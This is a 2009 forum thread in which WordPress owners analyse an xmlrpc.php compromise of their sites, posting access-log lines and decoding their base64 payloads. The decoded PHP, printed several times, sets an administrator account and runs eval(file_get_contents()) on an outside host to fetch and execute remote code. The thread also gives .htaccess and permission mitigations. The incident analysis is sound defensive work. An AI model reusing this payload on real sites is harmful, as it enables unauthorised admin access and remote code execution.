Question About Possible Hack of Site

I have been done too on https://www.photobomb.net – I was going through the upgrade process a few days ago when my laptop crashed and it has taken three days to fix it. I log back on today and arrive in hacker city!

Changed the permalinks and removed FrankGunning77 from the user database. I had noticed some strange registrations earlier this week and even started to write a blog post about hackers and the importance of upgrading WP.

What a week!

I think I have found the hack and the source. According to my access logs this appears to be the hack:

48200 122.135.85.220 – – [04/Sep/2009:04:53:41 -0400] “POST /xmlrpc.php HTTP/1.1 ” 200 173 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7″ ” Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Fir efox/0.9.3″

and the source as you can see appears to be IP 122.135.85.220

Anyone else out there that can confirm. I just looked as I found the problem and moved all of my data to a non-hacked server earlier on a new virtual server. So now I am looking at the cause.

RB

@rwboyer

I wonder what that POST request actually posted. I guess that long string is encrypted? That’s the referrer information, right? Or, is that just the argument passed to xmlrpc.php?

@rwboyer

NICE FIND!

Since the hack includes a method call to base64_decode I took the string from your find and VOILA! Here’s what you get:

$role=’administrator’;$user_login=’JeramyDeck79′;$user_pass=’OgrO!I3$Ld!!’;eval(file_get_contents(‘https://links.webwordpress.cn/data/shortpart2.txt’));exit;

The file:
https://links.webwordpress.cn/data/shortpart2.txt

You can open the file link in a browser. You can see they are pulling from the users table.

Once you have the hack on your site the attacker can execute WHATEVER they want using the base64_decode method call. Clever hack.

To be clear, the string “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdKZXJhbXlEZWNrNzk nOyR1c2VyX3Bhc3M9J09nck8hSTMkTGQhISc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0c DovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7”
when base64 decoded, gives the code above.

Temp fix for those using custom permalinks

Go to Permalinks, and take out the offending string.

Don’t know how long it will last, but it seems to have fixed my site, at least temporarily until an official patch or response has been made by WP

Stuart

rwboyer beat me to posting the first log. I found ours and its from a different IP. However that is no surprise as it is probably a botnet or compromised servers.

219.101.28.243 - - [03/Sep/2009:22:22:38 -0500] "POST /xmlrpc.php HTTP/1.1" 200 174 "JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdBZGFtU2x1c3Nlcjg1JzskdXNlcl9wYXNzPSdCWShkKCZ4OClLaXAnO2V2YWwoZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saW5rcy53ZWJ3b3JkcHJlc3MuY24vZGF0YS9zaG9ydHBhcnQyLnR4dCcpKTtleGl0Ow==" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en)"

The attacker also ran checks against “wp-login.php” and “wp-admin/options-permalink.php” before running the payload.

I should add that the payload is coming from the same place: https://links.webwordpress.cn/data/shortpart2.txt

Our payload just contained a different user/pass but was like the decode above.

@interbasket

I fixed my site 3 times in the past 24 hours by just doing the permalink fix. It’s not enough. It will return.

@cyberws

The decoded string is similar:

$role=’administrator’;$user_login=’AdamSlusser85′;$user_pass=’BY(d(&x8)Kip’;eval(file_get_contents(‘https://links.webwordpress.cn/data/shortpart2.txt’));exit;

@netslacker

Yup I decoded it. Damn annoying scripts.

To stop it cold just disable your xmlrpc.php by deleting it or changing permissions until a patch is provided.

If you don’t want external calls I would just change the permissions to something like 400. That way on upgrades you won’t forget to alter that file. You could in your .htaccess file deny access to the file and never worry about it during upgrades, assuming your .htaccess file isn’t jacked with:

<FilesMatch "^xmlrpc.php">
	    Deny from all
	</FilesMatch>

For us the hack didn’t alter any files because we don’t have many with write privileges by the web server. Still they did have an admin account. Grrrr…

Unfortunately many blogs need xmlrpc.php on and simply changing the name isn’t the answer as its a published file in the code for the page.

OK. So, it does look like xmlrpc.php is the entry point as I suspected. So, this call to xmlrpc creates the admin user and then after that, it should be able to do anything; such as uploading files to “uploads” folder and modifying some of the source code.

@cyberws

The only thing that I’m aware of that xmlrpc.php does are the ping backs and mobile update (like via iPhone). What else does it do which makes many sites “need” it?

I’ve already deleted xmlrpc.php from all my sites. This is not the first time xmlrpc.php was used for hacking. A while ago, I read somewhere that I should just delete the file because it’s more trouble than it’s worth.

Well xmlrpc.php is used for pingbacks and external updates. Unfortunately many, like us, can’t delete the script because we need it for several legit stuff. However WordPress should be able to secure this file a little better.

I would rather it be very picky and through out some valid calls. I will say deleting the file is good. However if you put the above code in your .htaccess file you will be protected even if you forget to delete the file during an upgrade.

I know it is possible to have Apache cover this file better. I am working on another call (that I will post later) that will have Apache remove some of the dangerous payloads.

I know for example one thing would be to clear $user_login in xmlrpc.php and then load the config information. That way anything that is loaded at the URL will be reset. Or if $user_login is define abort.

if ($_REQUEST{'user_login'}) {
print "What the heck are you doing?!!!!";
die();
}

I’ve found that there were multiple new files on my filesystem. All of them were capable of executing the payload delivered through the post action above. IT’S NOT JUST XMLRPC.php. In my case, I found at LEAST 10 files that were altered or newly added to the system that had the necessary function to execute the payload code.

Just because you block xmlrpc does not mean you’ve stopped their access to the site. This is ESPECIALLY true if you’ve already been hacked as they’ve likely added multiple entry points as in my case.

xmlrpc.php may have been the FIRST entry point, but if you’ve been attacked you must examine your filesystem carefully. See my earlier post.

What is curious about this hack is that it’s pretty obvious this was only Phase I. Some automatic bot went around opening the back doors on a whole bunch of sites last night. I assume, now the idea is to go back individually and do some real damage. Those of us discussing this here are lucky that we caught this in time before the real damage is done. But the mystery is: If the hacker was going to go back to individual sites to exploit, then why wouldn’t he just do it individually in the first place? Why did he use an automated bot? Why wouldn’t he just pick a site, run the bot on it, and then proceed to do whatever he wants to do?

The automation does not make sense especially because this hack breaks the URL and causes the site to return an error when individual posts were requested. Only the home page functions normally. So, once hacked, you notice it pretty easily. By the time the hacker decides to come back and exploit, the back door would be closed. It would make a lot more sense to hack site individually (not automate it).

Another possibility is that the hacker has already exploited our site (or server) in some way but we are not aware of it. In other words, Phase II had already occurred. Perhaps the hacker collected all the email addresses stored in the users table.

But if stealing email addresses were the only point, it wouldn’t make sense to go as far as modifying the permalink setup. Once the admin user is inserted, the hacker could get all the user information.

How easy is it to decrypt passwords store in WP?

Ok we have at least one 2.7.1 that got hacked. Permalink problem, but thus far I can’t find any new admin users.

I found our bad access:

88.165.203.192 – – [04/Sep/2009:06:07:15 -0700] “POST /xmlrpc.php HTTP/1.1” 200 900 “JHJvbGU9J2FkbWluaXN0cmF0b3InOyR1c2VyX2xvZ2luPSdCdWRkeUphcm5pZ2FuNzcnOyR1c2VyX3Bhc3M9JyM3RFdaYjhjdW5uRCc7ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xpbmtzLndlYndvcmRwcmVzcy5jbi9kYXRhL3Nob3J0cGFydDIudHh0JykpO2V4aXQ7” “Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12”

Ours decodes to:

$role=’administrator’;$user_login=’BuddyJarnigan77′;$user_pass=’#7DWZb8cunnD’;eval(file_get_contents(‘https://links.webwordpress.cn/data/shortpart2.txt’));exit;

However, I can’t find this user in the table? I looking directly at the database through a sql client and I don’t see any new users created today.

Anyone else see this?

-Kevin